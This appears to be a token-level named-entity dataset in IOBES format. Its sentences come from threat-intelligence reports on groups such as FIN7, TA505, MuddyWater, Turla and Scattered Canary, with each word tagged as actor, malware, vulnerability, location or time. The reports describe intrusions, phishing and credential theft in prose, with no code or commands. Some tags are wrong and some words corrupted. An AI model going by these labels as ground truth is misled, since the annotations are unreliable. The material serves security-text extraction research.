O +We O +believe O +the O +actors S-APT +pivoted O +to O +other O +systems O +on O +the O +network O +using O +stolen B-ACT +credentials E-ACT +and O +by O +exploiting O +the O +CVE-2017-0144 S-VULID +( O +EternalBlue S-VULNAME +) O +vulnerability O +patched O +in O +MS17-010 S-FILE +. O +Once O +the O +adversary O +established O +a O +foothold O +on O +the O +targeted O +network O +, O +they S-APT +used O +China B-MAL +Chopper E-MAL +and O +other O +webshells S-TOOL +to O +upload O +additional O +tools O +to O +the O +SharePoint O +server O +to O +dump B-ACT +credentials E-ACT +, O +perform O +network O +reconnaissance O +and O +pivot O +to O +other O +systems O +. O +We O +also O +observed O +Emissary B-APT +Panda E-APT +uploading O +legitimate O +tools O +that O +would O +sideload B-ACT +DLLs E-ACT +, O +specifically O +the O +Sublime O +Text O +plugin O +host O +and O +the O +Microsoft’s O +Create O +Media O +application O +, O +both O +of O +which O +we O +had O +never O +seen O +used O +for O +DLL B-ACT +sideloading E-ACT +before O +. O +Consequently O +, O +the O +Linux S-OS +malware O +ecosystem O +is O +plagued O +by O +financial S-IDTY +driven O +crypto-miners O +and O +DDoS O +botnet O +tools O +which O +mostly O +target O +vulnerable B-IDTY +servers E-IDTY +. O +We O +also O +observed O +the O +actors S-APT +uploading O +legitimate O +tools O +that O +would O +sideload B-ACT +DLLs E-ACT +, O +specifically O +the O +Sublime B-MAL +Text E-MAL +plugin O +host O +and O +the O +Microsoft’s O +Create O +Media B-MAL +application E-MAL +, O +both O +of O +which O +we O +had O +never O +seen O +used O +for O +DLL S-TOOL +sideloading O +before O +. O +It S-APT +has O +been O +active O +since O +at O +least O +2013 S-TIME +, O +and O +has O +targeted O +individuals O +likely O +involved O +with O +the O +Ukrainian S-LOC +government O +. 
O +The O +group’s S-APT +implants O +are O +characterized O +by O +the O +employment O +of O +information O +stealing B-MAL +tools E-MAL +among O +them O +being O +screenshot O +and O +document B-MAL +stealers E-MAL +delivered O +via O +a O +SFX O +, O +and O +made O +to O +achieve O +persistence O +through O +a O +scheduled O +task O +. O +The O +finding O +shows O +that O +EvilGnome S-MAL +operates O +on O +an O +IP S-PROT +address O +that O +was O +controlled O +by O +the O +Gamaredon B-APT +group E-APT +two O +months O +ago O +. O +FIN7 S-APT +operations O +are O +linked O +to O +numerous O +intrusion O +attempts O +having O +targeted O +hundreds O +of O +companies O +since O +at O +least O +as O +early O +as O +2015 S-TIME +. O +The O +FIN7 S-APT +intrusion O +set O +continued O +its O +tailored O +spear B-ACT +phishing E-ACT +campaigns O +throughout O +last B-TIME +year E-TIME +. O +In O +addition O +, O +during O +the O +investigation O +, O +we O +discovered O +certain O +similarities O +to O +other O +attacker B-APT +groups E-APT +that O +seemed O +to O +share O +or O +copy O +the O +FIN7 S-APT +TTPs O +in O +their O +own O +operations O +. O +In O +2018-2019 S-TIME +, O +researchers O +of O +Kaspersky S-SECTEAM +Lab’s B-SECTEAM +Global I-SECTEAM +Research I-SECTEAM +and I-SECTEAM +Analysis I-SECTEAM +Team E-SECTEAM +analyzed O +various B-ACT +campaigns E-ACT +that O +used O +the O +same O +Tactics O +Tools O +and O +Procedures O +(TTPs) O +as O +the O +historic O +FIN7 S-APT +, O +leading O +the O +researchers O +to O +believe O +that O +this O +threat O +actor O +had O +remained O +active O +despite O +the O +2018 S-TIME +arrests O +. 
O +One O +of O +the O +domains O +used O +by O +FIN7 S-APT +in O +their O +2018 S-TIME +campaign O +of O +spear B-ACT +phishing E-ACT +contained O +more O +than O +130 O +email S-TOOL +APTes O +, O +leading O +us O +to O +think O +that O +more O +than O +130 O +companies O +had O +been O +targeted O +by O +the O +end O +of O +2018 S-TIME +. O +Interestingly O +, O +following O +some O +open-source O +publications O +about O +them O +, O +the O +FIN7 S-APT +operators O +seems O +to O +have O +developed O +a O +homemade O +builder O +of O +malicious B-MAL +Office I-MAL +document E-MAL +using O +ideas O +from O +ThreadKit O +, O +which O +they O +employed O +during O +the O +summer O +of O +2018 S-TIME +. O +The O +first O +module O +downloaded O +by O +the O +GRIFFON S-FILE +malware O +to O +the O +victim’s O +computer O +is O +an O +information-gathering O +JScript O +, O +which O +allows O +the O +cybercriminals O +to O +understand O +the O +context O +of O +the O +infected O +workstation O +. O +The O +new O +GRIFFON S-FILE +implant O +is O +written O +to O +the O +hard O +drive O +before O +each O +execution O +, O +limiting O +the O +file-less” O +aspect O +of O +this O +method O +. O +Given O +FIN7’s S-APT +previous O +use O +of O +false O +security B-IDTY +companies E-IDTY +, O +we O +decided O +to O +look O +deeper O +into O +this O +one O +. O +This O +activity B-APT +cluster E-APT +, O +which O +Kaspersky S-SECTEAM +Lab O +has O +followed O +for O +a O +few O +years O +, O +uses O +various O +implants O +for O +targeting O +mainly O +banks S-IDTY +, O +and O +developers O +of O +banking O +and O +money B-IDTY +processing E-IDTY +software O +solutions O +. O +FIN7’s S-APT +last O +campaigns O +were O +targeting O +banks S-IDTY +in O +Europe S-LOC +and O +Central B-LOC +America E-LOC +. 
O +After O +a O +successful O +penetration O +, O +FIN7 S-APT +uses O +its O +own O +backdoors S-MAL +and O +the O +CobaltStrike B-MAL +framework E-MAL +or O +Powershell S-MAL +Empire O +components O +to O +hop O +to O +interesting O +parts O +of O +the O +network O +, O +where O +it O +can O +monetize O +its O +access O +. O +AveMaria S-APT +is O +a O +new O +botnet O +, O +whose O +first O +version O +we O +found O +in O +September B-TIME +2018 E-TIME +, O +right O +after O +the O +arrests O +of O +the O +FIN7 S-APT +members O +. O +This O +threat O +actor O +stole O +suspected O +of O +stealing O +€13 O +million O +from O +Bank S-IDTY +of O +Valetta O +, O +Malta O +earlier O +this B-TIME +year E-TIME +. O +In O +fact O +, O +AveMaria S-FILE +is O +a O +classic O +infostealer O +bot O +that O +collects O +all O +possible O +credentials O +from O +various O +types O +of O +software: O +browsers O +, O +email S-TOOL +clients O +, O +messengers O +, O +etc. O +, O +and O +can O +act O +as O +a O +keylogger O +. O +They S-APT +also O +use O +AutoIT B-MAL +droppers E-MAL +, O +password-protected O +EXE O +files O +and O +even O +ISO O +images O +. O +To O +deliver O +their O +malware O +, O +the O +cyber B-APT +criminals E-APT +use O +spearphishing B-MAL +emails E-MAL +with O +various O +types O +of O +attachments: S-MAL +MS O +Office O +documents S-MAL +or O +spreadsheet O +files O +exploiting O +some O +known O +vulnerability O +like O +CVE-2017-11882 S-VULID +, O +or O +documents S-MAL +with O +Ole2Link O +and O +SCT O +. O +Interestingly O +, O +this O +actor S-APT +targeted O +financial S-IDTY +entities O +and O +companies O +in O +one O +African S-LOC +country O +, O +which O +lead O +us O +to O +think O +that O +CopyPaste O +was O +associated O +with O +cybermercenaries O +or O +a O +training O +center O +. 
O +At O +the O +end B-TIME +of I-TIME +2018 E-TIME +, O +while O +searching O +for O +new O +FIN7 S-APT +campaigns O +via O +telemetry O +, O +we O +discovered O +a O +set O +of O +activity O +that O +we O +temporarily O +called O +CopyPaste” S-ACT +from O +a O +previously O +unknown O +APT O +. O +FIN7 S-APT +and O +Cobalt S-APT +used O +decoy S-ACT +302 O +HTTP S-PROT +redirections O +too O +, O +FIN7 S-APT +on O +its O +GRIFFON O +C2s O +before O +January B-TIME +2018 E-TIME +, O +and O +Cobalt O +, O +on O +its O +staging O +servers O +, O +similar O +to O +CopyPaste O +. O +Quite O +recently O +, O +FIN7 S-APT +threat O +actors O +typosquatted O +the O +brand O +Digicert” S-IDTY +using O +the O +domain O +name O +digicert-cdn[.]com O +, O +which O +is O +used O +as O +a O +command S-MAL +and O +control B-MAL +server E-MAL +for O +their O +GRIFFON O +implants O +. O +The O +first O +of O +them O +is O +the O +well-known O +FIN7 S-APT +, O +which O +specializes O +in O +attacking O +various B-IDTY +companies E-IDTY +to O +get O +access O +to O +financial S-IDTY +data O +or O +PoS O +infrastructure O +. O +The O +second O +one O +is O +CobaltGoblin S-APT +Carbanak S-APT +EmpireMonkey S-APT +, O +which O +uses O +the O +same O +toolkit O +, O +techniques O +and O +similar O +infrastructure O +but O +targets O +only O +financial S-IDTY +institutions O +and O +associated O +software/services O +providers O +. O +we O +observe O +, O +with O +various O +level O +of O +confidence O +, O +that O +there O +are O +several O +interconnected O +groups S-APT +using O +very O +similar B-MAL +toolkits E-MAL +and O +the O +same O +infrastructure S-MAL +to O +conduct O +their O +cyberattacks O +. 
O +The O +last O +piece O +is O +the O +newly O +discovered O +CopyPaste S-APT +group O +, O +who O +targeted O +financial S-IDTY +entities O +and O +companies S-IDTY +in O +one O +African S-LOC +country O +, O +which O +lead O +us O +to O +think O +that O +CopyPaste O +was O +associated O +with O +cybermercenaries O +or O +a O +training B-IDTY +center E-IDTY +. O +At O +the O +end B-TIME +of I-TIME +2018 E-TIME +, O +the O +cluster S-APT +started O +to O +use O +not O +only O +CobaltStrike S-MAL +but O +also O +Powershell S-MAL +Empire O +in O +order O +to O +gain O +a O +foothold O +on O +the O +victims’ O +networks O +. O +FIN7 S-APT +thus O +continues O +to O +use O +effective O +spearphishing S-ACT +campaigns O +in O +conjunction O +with O +well-known O +MS O +Office O +exploits O +generated O +by O +the O +framework O +. O +MuddyWater S-APT +is O +widely O +regarded O +as O +a O +long-lived O +APT O +group O +in O +the O +Middle B-LOC +East E-LOC +. O +From O +February O +to O +April B-TIME +2019 E-TIME +, O +MuddyWater S-APT +launched O +a O +series O +of O +spear-phishing S-ACT +attacks O +against O +governments S-IDTY +, O +educational B-IDTY +institutions E-IDTY +, O +financial S-IDTY +, O +telecommunications S-IDTY +and O +defense S-IDTY +companies O +in O +Turkey S-LOC +, O +Iran S-LOC +, O +Afghanistan S-LOC +, O +Iraq S-LOC +, O +Tajikistan S-LOC +and O +Azerbaijan S-LOC +. O +FIN7 S-APT +thus O +continue O +to O +use O +effective O +spearphishing S-ACT +campaigns O +in O +conjunction O +with O +well-known O +MS O +Office O +exploits O +generated O +by O +the O +framework O +. 
O +We O +also O +unearthed O +and O +detailed O +our O +other O +findings O +on O +MuddyWater S-APT +, O +such O +as O +its O +connection O +to O +four O +Android S-OS +malware S-MAL +variants O +and O +its O +use O +of O +false O +flag O +techniques O +, O +among O +others O +, O +in O +our O +report O +New O +MuddyWater O +Activities O +Uncovered: O +Threat O +Actors O +Used O +Multi-Stage B-MAL +Backdoors E-MAL +, O +False B-MAL +Flags E-MAL +, O +Android S-OS +malware S-MAL +, O +and O +More O +. O +Instead O +, O +the O +campaign O +used O +compromised B-MAL +legitimate I-MAL +accounts E-MAL +to O +trick O +victims O +into O +installing B-ACT +malware E-ACT +. O +Notably O +, O +the O +group’s S-APT +use O +of O +email S-MAL +as O +infection O +vector O +seems O +to O +yield O +success O +for O +their O +campaigns S-ACT +. O +We O +also O +observed O +MuddyWater’s S-APT +use O +of O +multiple O +open O +source O +post-exploitation B-MAL +tools E-MAL +, O +which O +they O +deployed O +after O +successfully O +compromising O +a O +target O +. O +The O +attacker S-APT +also O +connected S-ACT +to O +the O +compromised O +servers O +from O +IP S-PROT +addresses O +that O +were O +linked O +to O +dynamic O +domain O +names O +used O +as O +C&Cs O +by O +the O +delivered B-MAL +payloads E-MAL +. O +The O +main O +payload O +is O +usually O +Imminent O +Monitor B-FILE +RAT E-FILE +; O +however O +, O +at O +the O +beginning B-TIME +of I-TIME +2018 E-TIME +, O +we O +also O +observed O +the O +use O +of O +LuminosityLink B-FILE +RAT E-FILE +, O +NetWire B-FILE +RAT E-FILE +, O +and O +NjRAT S-FILE +. O +In O +a O +case O +in O +June B-TIME +2019 E-TIME +, O +we O +also O +noticed O +Warzone B-FILE +RAT E-FILE +being O +used O +. O +Xpert B-FILE +RAT E-FILE +reportedly O +first O +appeared O +in O +2011 S-TIME +. O +The O +first O +version O +of O +Proyecto B-FILE +RAT” E-FILE +was O +published O +at O +the O +end O +of O +2010 S-TIME +. 
O +But O +with O +the O +West O +African S-LOC +gang O +we’ve O +named O +Scattered B-APT +Canary E-APT +, O +we O +have O +a O +deeper O +look O +at O +how O +business O +email S-TOOL +compromise O +is O +connected S-ACT +to O +the O +rest O +of O +the O +cybercrime O +. O + +This O +investigation O +by O +the O +Agari B-SECTEAM +Cyber I-SECTEAM +Intelligence E-SECTEAM +Division O +into O +the O +cybercriminal O +group O +we’ve O +named O +Scattered B-APT +Canary E-APT +offers O +unprecedented O +visibility O +into O +eleven O +years O +of O +fraud O +and O +criminal O +activities O +, O +and O +the O +growth O +of O +a O +419 O +startup O +into O +a O +fully O +operational O +BEC O +business S-IDTY +. O +While O +this O +criminal O +organization’s S-SECTEAM +activities O +now O +center O +around O +BEC O +, O +and O +extend O +to O +romance B-ACT +scams E-ACT +, O +credit B-ACT +card I-ACT +fraud E-ACT +, O +check B-ACT +fraud E-ACT +, O +fake B-ACT +job E-ACT +listings O +, O +credential B-ACT +harvesting E-ACT +, O +tax B-ACT +schemes E-ACT +, O +and O +more O +, O +these O +actors O +came O +from O +much O +humbler O +beginnings O +, O +starting O +with O +basic O +Craigslist O +scams O +in O +2008 S-TIME +. O +On O +November B-TIME +29 E-TIME +, O +2018 S-TIME +, O +Scattered B-APT +Canary E-APT +sent O +an O +attack O +email S-TOOL +to O +Agari O +CFO O +Raymond O +Lim O +, O +enquiring O +as O +to O +his O +availability O +to O +send O +out O +a O +domestic O +wire O +transfer O +. O +Many O +feel O +that O +they O +have O +a O +home O +team O +advantage O +living O +in O +Nigeria S-LOC +, O +where O +they S-APT +are O +free O +to O +pay O +off O +law O +enforcement O +to O +look O +the O +other O +ACT O +. O +Scattered B-APT +Canary’s E-APT +fraudulent O +history O +can O +be O +traced O +as O +far O +back O +as O +October B-TIME +2008 E-TIME +, O +when O +the O +group O +first O +arrived O +on O +the O +cybercriminal O +circuit O +. 
O +By O +March B-TIME +2016 E-TIME +, O +one O +of O +Scattered B-APT +Canary’s E-APT +members O +had O +built O +enough O +trust O +with O +a O +romance O +victim—who O +we’ll O +call O +Jane—that O +she O +became O +a O +frequent O +source O +of O +new O +mule O +accounts O +for O +the O +group O +. O +Alpha’s S-APT +early O +role O +was O +fairly O +simple: O +engage O +with O +individuals O +, O +who O +he O +chose O +based O +on O +the O +goods O +they O +were O +selling O +, O +and O +then O +provide O +personal O +shipping O +addresses O +back O +to O +Omega O +. O +By O +all O +accounts O +, O +late B-TIME +2015 E-TIME +was O +the O +beginning O +of O +BEC O +for O +Scattered B-APT +Canary E-APT +. O +The O +first O +type O +of O +attack O +Scattered B-APT +Canary E-APT +pivoted O +to O +was O +credential B-ACT +phishing E-ACT +. O +Between O +July B-TIME +2015 E-TIME +and O +February B-TIME +2016 E-TIME +, O +Scattered B-APT +Canary’s E-APT +primary O +focus O +seemed O +to O +be O +mass O +harvesting O +general O +credentials O +using O +a O +Google O +Docs O +phishing S-ACT +page O +. O +In O +the O +first O +few O +months O +of O +their O +credential O +phishing S-ACT +ventures O +, O +Scattered B-APT +Canary’s E-APT +sights O +were O +mostly O +set O +on O +Asian S-LOC +targets—Malaysia S-LOC +and O +Japan S-LOC +, O +in O +particular O +. O +In O +November B-TIME +2015 E-TIME +, O +the O +group O +started O +to O +focus O +on O +North B-LOC +American E-LOC +users O +, O +mostly O +in O +the O +United B-LOC +States E-LOC +. O +This O +activity O +ceased O +in O +February B-TIME +2016 E-TIME +, O +likely O +because O +the O +men O +who O +made O +up O +Scattered B-APT +Canary E-APT +began O +to O +focus O +on O +honing O +their O +BEC O +skills O +. O + +In O +total O +, O +Scattered B-APT +Canary E-APT +received O +more O +than O +3 O +, O +000 O +account O +credentials O +as O +a O +result O +of O +their O +phishing S-ACT +attacks O +. 
O +For O +over O +eighteen O +months O +from O +March B-TIME +2017 E-TIME +until O +November B-TIME +2018 E-TIME +, O +Scattered B-APT +Canary’s E-APT +frequent O +enterprise-focused O +credential O +phishing B-ACT +campaigns E-ACT +almost O +exclusively O +targeted O +businesses O +in O +the B-LOC +United I-LOC +States E-LOC +and O +Canada S-LOC +. O +In O +July B-TIME +2018 E-TIME +, O +following O +a O +trend O +we O +have O +observed O +across O +the O +entire O +BEC O +threat O +landscape O +, O +Scattered B-APT +Canary E-APT +changed O +their O +preferred O +cash O +out O +mechanism O +from O +wire O +transfers O +to O +gift O +cards O +. O +Instead O +of O +using O +fake O +Google O +Docs O +phishing S-ACT +pages O +to O +collect O +personal O +email S-TOOL +login O +credentials O +, O +Scattered B-APT +Canary E-APT +began O +using O +phishing S-ACT +pages O +of O +commonly O +used O +business O +applications O +to O +compromise O +enterprise O +credentials O +. O +Using O +personal O +information O +obtained O +from O +various O +sources O +, O +Scattered B-APT +Canary E-APT +started O +perpetrating O +fraud O +against O +US S-LOC +federal O +and O +state B-IDTY +government I-IDTY +agencies E-IDTY +. O +In O +total O +, O +35 O +actors O +have O +been O +tied O +to O +Scattered B-APT +Canary’s E-APT +operations O +since O +the O +group O +emerged O +in O +2008 S-TIME +. O +Just O +as O +with O +romance O +scams O +, O +actors S-APT +make O +use O +of O +scripts S-MAL +and O +templates S-MAL +they O +can O +copy-and-paste O +without O +having O +to O +create O +something O +on O +their O +own O +. 
O +When O +it O +comes O +to O +engaging O +targets O +, O +Scattered B-APT +Canary E-APT +frequently O +maximized O +efficiencies O +through O +the O +use O +of O +scripts O +, O +or O +as O +some O +members O +of O +the O +group O +call O +them O +, O +formats.” O +These O +formats O +are O +templated O +text O +documents O +that O +can O +contain O +several O +layers O +of O +phishing S-ACT +messages O +to O +send O +to O +potential O +victims O +. O +Recently O +, O +we O +unveiled O +the O +existence O +of O +a O +UEFI O +rootkit O +, O +called O +LoJax S-MAL +, O +which O +we O +attribute O +to O +the O +Sednit S-APT +group O +. O +If O +Scattered B-APT +Canary E-APT +can O +be O +seen O +as O +a O +microcosm O +for O +the O +rapidly O +evolving O +organizations O +behind O +today’s O +most O +pernicious O +email B-ACT +scams E-ACT +, O +this O +report O +demonstrates O +that O +a O +much O +more O +holistic O +approach—one O +based O +on O +threat O +actor O +identity O +rather O +than O +type O +of O +fraudulent O +activity—is O +required O +to O +detect O +email S-TOOL +fraud O +and O +protect O +organizations O +. O +This O +is O +a O +first O +for O +an O +APT O +group O +, O +and O +shows O +Sednit S-APT +has O +access O +to O +very O +sophisticated B-MAL +tools E-MAL +to O +conduct O +its O +espionage O +operations O +. O +Three B-TIME +years I-TIME +ago E-TIME +, O +the O +Sednit S-APT +group O +unleashed O +new O +components O +targeting O +victims O +in O +various O +countries O +in O +the O +Middle B-LOC +East E-LOC +and O +Central B-LOC +Asia E-LOC +. O +In O +the O +past O +, O +Sednit S-APT +used O +a O +similar O +technique O +for O +credential B-ACT +phishing E-ACT +. O +At O +the O +end O +of O +August O +2018 S-TIME +, O +the O +Sednit O +group O +launched O +a O +spearphishing S-ACT +email S-TOOL +campaign O +where O +it O +distributed O +shortened O +URLs O +that O +delivered O +the O +first O +stage O +of O +Zebrocy O +components O +. 
O +As O +we O +explained O +in O +our O +most O +recent O +blogpost O +about O +Zebrocy S-APT +, O +the O +configuration O +of O +the O +backdoor S-MAL +is O +stored O +in O +in O +the O +resource O +section O +and O +is O +split O +into O +four O +different O +hex-encoded S-ENCR +, O +encrypted O +blobs O +. O +The O +past O +iteration O +of O +SLUB S-APT +spread O +from O +a O +unique O +watering B-ACT +hole E-ACT +website O +exploiting O +CVE-2018-8174 S-VULID +, O +a O +VBScript O +engine O +vulnerability O +. O +It S-APT +used O +GitHub S-MAL +and O +Slack S-MAL +as O +tools O +for O +communication O +between O +the O +malware O +and O +its O +controller O +. O +On O +July B-TIME +9 E-TIME +, O +we O +discovered O +a O +new O +version O +of O +SLUB S-APT +delivered O +via O +another O +unique O +watering B-ACT +hole E-ACT +website O +. O +This O +malicious O +site O +used O +CVE-2019-0752 S-VULID +, O +an O +Internet O +Explorer O +vulnerability O +discovered O +by O +Trend B-SECTEAM +Micro’s I-SECTEAM +Zero I-SECTEAM +Day I-SECTEAM +Initiative E-SECTEAM +( O +ZDI S-SECTEAM +) O +that O +was O +just O +patched O +this O +April S-TIME +. O + +Since O +we O +published O +out O +last O +report O +on O +SLUB S-APT +, O +the O +backdoor S-MAL +has O +been O +updated O +and O +several O +improvements O +were O +implemented O +. O +The O +SLUB S-APT +malware O +was O +delivered O +through O +watering O +hole O +websites O +that O +were O +injected O +with O +exploits O +for O +CVE-2018-8174 S-VULID +or O +CVE-2019-0752 S-VULID +. O +During O +this O +attack O +, O +we O +found O +that O +the O +SLUB S-APT +malware O +used B-ACT +two I-ACT +Slack E-ACT +teams O +sales-yww9809” O +and O +marketing-pwx7789 O +. O +SWEED S-APT +remains O +consistent O +across O +most O +of O +their O +campaigns O +in O +their O +use O +of O +spear-phishing S-ACT +emails S-TOOL +with O +malicious O +attachments O +. 
O +In O +April B-TIME +2018 E-TIME +, O +SWEED S-APT +began O +making O +use O +of O +a O +previously O +disclosed O +Office O +exploit S-VULNAME +. O +In O +May B-TIME +2018 E-TIME +, O +campaigns O +being O +conducted O +by O +SWEED S-APT +began O +leveraging O +another O +vulnerability O +in O +Microsoft S-IDTY +Office: O +CVE-2017-11882 S-VULID +, O +a O +remote O +code O +execution O +bug O +in O +Microsoft S-IDTY +Office O +that O +is O +commonly O +observed O +being O +leveraged O +in O +malicious O +documents O +used O +in O +commodity O +malware O +distribution O +. O +We O +found O +them S-APT +targeting O +countries O +in O +the O +Middle B-LOC +East E-LOC +such O +as O +United B-LOC +Arab I-LOC +Emirates E-LOC +and O +Saudi B-LOC +Arabia E-LOC +, O +as O +well O +as O +other O +countries O +such O +as O +India S-LOC +, O +Japan S-LOC +, O +Argentina S-LOC +, O +the B-LOC +Philippines E-LOC +, O +and O +South B-LOC +Korea E-LOC +. O +Similar O +to O +previous O +campaigns O +, O +the O +JAR S-FILE +was O +directly O +attached O +to O +emails S-TOOL +and O +used O +file O +names O +such O +as O +Order_2018.jar S-MAL +. O +Code O +contained O +inside O +one O +of O +the O +slides S-FILE +triggers O +an O +exploit S-VULNAME +for O +CVE-2017-8759 S-VULID +, O +a O +remote O +code O +execution O +vulnerability O +in O +Microsoft B-TOOL +.NET I-TOOL +framework E-TOOL +. O + +TA505 S-APT +is O +also O +using O +FlowerPippi S-MAL +( O +Backdoor.Win32.FLOWERPIPPI.A S-MAL +) O +, O +a O +new O +backdoor S-MAL +that O +we O +found O +them O +using O +in O +their O +campaigns O +against O +targets O +in O +Japan S-LOC +, O +India S-LOC +, O +and O +Argentina S-LOC +. O +TA505 S-APT +targeted O +Middle B-LOC +Eastern E-LOC +countries O +in O +a O +June B-TIME +11 E-TIME +campaign O +that O +delivered O +more O +than O +90% O +of O +the O +total O +spam O +emails S-TOOL +to O +the O +UAE S-LOC +, O +Saudi B-LOC +Arabia E-LOC +, O +and O +Morroco S-LOC +. 
O +It S-APT +fetches O +the O +same O +FlawedAmmyy B-ACT +downloader E-ACT +.msi O +file O +, O +then O +downloads O +the O +FlawedAmmyy B-MAL +payload E-MAL +. O +TA505 S-APT +used O +Wizard B-MAL +(.wiz) I-MAL +files E-MAL +in O +this O +campaign O +, O +with O +FlawedAmmyy B-MAL +RAT E-MAL +as O +the O +final O +payload O +. O +On O +June B-TIME +14 E-TIME +, O +we O +saw O +TA505’s S-APT +campaign O +still O +targeting O +UAE S-LOC +with O +similar O +tactics O +and O +techniques O +, O +but O +this O +time O +, O +some O +of O +the O +spam O +emails S-TOOL +were O +delivered O +via O +the O +Amadey B-MAL +botnet E-MAL +. O +It S-APT +later O +delivered O +an O +information O +stealer O +named O +EmailStealer S-MAL +, O +” O +which O +stolesimple B-PROT +mail I-PROT +transfer I-PROT +protocol E-PROT +( +SMTP S-PROT +) O +credentials O +and O +email S-TOOL +addresses O +in O +the O +victim’s O +machine O +. O +On O +June B-TIME +18 E-TIME +, O +the O +majority O +of O +the O +campaign’s S-ACT +spam O +emails S-TOOL +were O +sent O +with O +the O +subject O +, O +Your O +RAKBANK O +Tax O +Invoice O +/ O +Tax O +Credit O +Note” O +or O +Confirmation O +. O +This O +campaign O +used O +the O +abovementioned O +.HTML S-TOOL +file O +, O +malicious O +Excel/Word S-TOOL +document O +VBA O +macro S-MAL +, O +the O +FlawedAmmyy B-MAL +payload E-MAL +, O +and O +Amadey S-MAL +. O +On O +June B-TIME +24 E-TIME +, O +we O +found O +another O +campaign O +targeting O +Lebanon S-LOC +with O +the O +ServHelper S-FILE +malware O +. O +On O +June B-TIME +17 E-TIME +, O +we O +observed O +the O +campaign’s S-ACT +spam O +emails S-TOOL +delivering O +malware-embedded O +Excel O +files O +directly O +as O +an O +attachment O +. O +On O +June B-TIME +20 E-TIME +, O +we O +spotted O +the O +campaign’s O +spam O +emails S-TOOL +delivering O +.doc O +and O +.xls O +files O +. 
O +Nonetheless O +, O +these O +spam B-FILE +emails E-FILE +were O +not O +delivered O +to O +the O +UAE S-LOC +or O +Arabic-speaking S-LOC +users O +, O +but O +to O +banks S-IDTY +in O +Asian S-LOC +countries O +such O +as O +India S-LOC +, O +Indonesia S-LOC +, O +and O +the B-LOC +Philippines E-LOC +. O +After O +our O +analysis O +, O +we O +found O +that O +Proofpoint S-SECTEAM +reported O +this O +malware O +as O +AndroMut S-APT +as O +well O +. O +In O +the O +campaign O +that O +targeted O +Japan S-LOC +, O +Philippines S-LOC +, O +and O +Argentina S-LOC +on O +June B-TIME +20 E-TIME +, O +we O +found O +what O +seems O +to O +be O +a O +new O +, O +undisclosed O +malware O +, O +which O +we O +named O +Gelup S-FILE +. O +Another O +new O +malware O +we O +found O +that O +TA505 S-APT +is O +using O +in O +their O +campaigns O +last O +June B-TIME +20 E-TIME +against O +targets O +in O +Japan S-LOC +, O +the O +Philippines S-LOC +, O +and O +Argentina S-LOC +is O +FlowerPippi S-MAL +. O +The O +malicious O +email S-TOOL +contains O +a O +highly O +suspicious O +sample O +which O +triggered O +the O +ZLAB S-SECTEAM +team O +to O +investigate O +its O +capabilities O +and O +its O +possible O +attribution O +, O +discovering O +a O +potential O +expansion O +of O +the O +TA505 S-APT +operation O +. O +The O +attack O +, O +as O +stated O +by O +CyberInt O +, O +leveraged O +a O +command O +and O +control O +server O +located O +in O +Germany S-LOC +related O +to O +the O +TA505 S-APT +actor: O +a O +very O +active O +group O +involved O +in O +cyber-criminal O +operation O +all O +around O +the O +world O +, O +threatening O +a O +wide O +range O +of O +high B-IDTY +profile I-IDTY +companies E-IDTY +, O +active O +since O +2014 S-TIME +. 
O +The O +comparison O +of O +the O +infection O +chains O +reveals O +in O +both O +cases O +TA505 S-APT +used O +a O +couple O +of O +SFX O +stages O +to O +deploy B-ACT +the I-ACT +RMS” E-ACT +software: O +a O +legitimate O +remote B-MAL +administration I-MAL +tool E-MAL +produced O +by O +the O +Russian S-LOC +company O +TektonIT O +. O +The O +TA505 S-APT +group O +is O +one O +of O +the O +most O +active O +threat O +groups O +operating O +since O +2014 S-TIME +, O +it O +has O +traditionally O +targeted O +Banking S-IDTY +and O +Retail S-IDTY +industries O +, O +as O +we O +recently O +documented O +during O +the O +analysis O +of O +the O +Stealthy O +email S-TOOL +Stealer” O +part O +of O +their O +arsenal O +. O +Also O +, O +some O +code O +pieces O +are O +directly O +re-used O +in O +the O +analyzed O +campaigns O +, O +such O +as O +the O +i.cmd” S-FILE +and O +exit.exe” S-FILE +files O +, O +and O +, O +at O +the O +same O +time O +, O +some O +new O +components O +have O +been O +introduced O +, O +for O +instance O +the O +rtegre.exe” S-FILE +and O +the O +veter1605_MAPS_10cr0.exe” S-FILE +file O +. O +In O +2018 S-TIME +, O +Kaspersky S-SECTEAM +Labs O +published O +a O +report O +that O +analyzed O +a O +Turla S-APT +PowerShell B-MAL +loader E-MAL +that O +was O +based O +on O +the O +open-source O +project O +Posh-SecMod O +. O +Turla S-APT +is O +believed O +to O +have O +been O +operating O +since O +at O +least O +2008 S-TIME +, O +when O +it O +successfully O +breached O +the O +US O +military S-IDTY +. O +This O +is O +not O +the O +first O +time O +Turla S-APT +has O +used O +PowerShell S-MAL +in-memory O +loaders O +to O +increase O +its O +chances O +of O +bypassing O +security O +products O +. O +However O +, O +it O +is O +likely O +the O +same O +scripts O +are O +used O +more O +globally O +against O +many O +traditional O +Turla S-APT +targets O +in O +Western B-LOC +Europe E-LOC +and O +the O +Middle B-LOC +East E-LOC +. 
O +In O +some O +samples O +deployed O +since O +March B-TIME +2019 E-TIME +, O +Turla S-APT +developers O +modified O +their O +PowerShell S-TOOL +scripts O +in O +order O +to O +bypass O +the O +Antimalware B-TOOL +Scan I-TOOL +Interface E-TOOL +( O +AMSI S-TOOL +) O +. O + +Based O +on O +our O +research O +, O +SWEED S-APT +— O +which O +has O +been O +operating O +since O +at O +least O +2017 S-TIME +— O +primarily O +targets O +their O +victims O +with O +stealers O +and O +remote O +access O +trojans O +. O +It O +is O +interesting O +to O +note O +that O +Turla S-APT +operators O +used O +the O +free O +email S-TOOL +provider O +GMX O +again O +, O +as O +in O +the O +Outlook B-MAL +Backdoor E-MAL +and O +in O +LightNeuron S-MAL +. O +This O +new O +research O +confirms O +our O +forecast O +and O +shows O +that O +the O +Turla S-APT +group O +does O +not O +hesitate O +to O +use O +open-source O +pen-testing O +frameworks S-MAL +to O +conduct O +intrusion O +. O +Neptun S-FILE +is O +installed O +on O +Microsoft S-IDTY +Exchange O +servers O +and O +is O +designed O +to O +passively O +listen O +for O +commands O +from O +the O +attackers S-APT +. O +One O +attack O +during O +this O +campaign O +involved O +the O +use O +of O +infrastructure O +belonging O +to O +another O +espionage O +group O +known O +as O +Crambus S-APT +aka O +OilRig S-APT +, O +APT34 S-APT +. O +Waterbug S-APT +has O +been O +using O +Meterpreter S-MAL +since O +at O +least O +early B-TIME +2018 E-TIME +and O +, O +in O +this O +campaign O +, O +used O +a O +modified O +version O +of O +Meterpreter S-MAL +, O +which O +was O +encoded O +and O +given O +a O +.wav O +extension O +in O +order O +to O +disguise O +its O +true O +purpose O +. O +In O +all O +likelihood O +, O 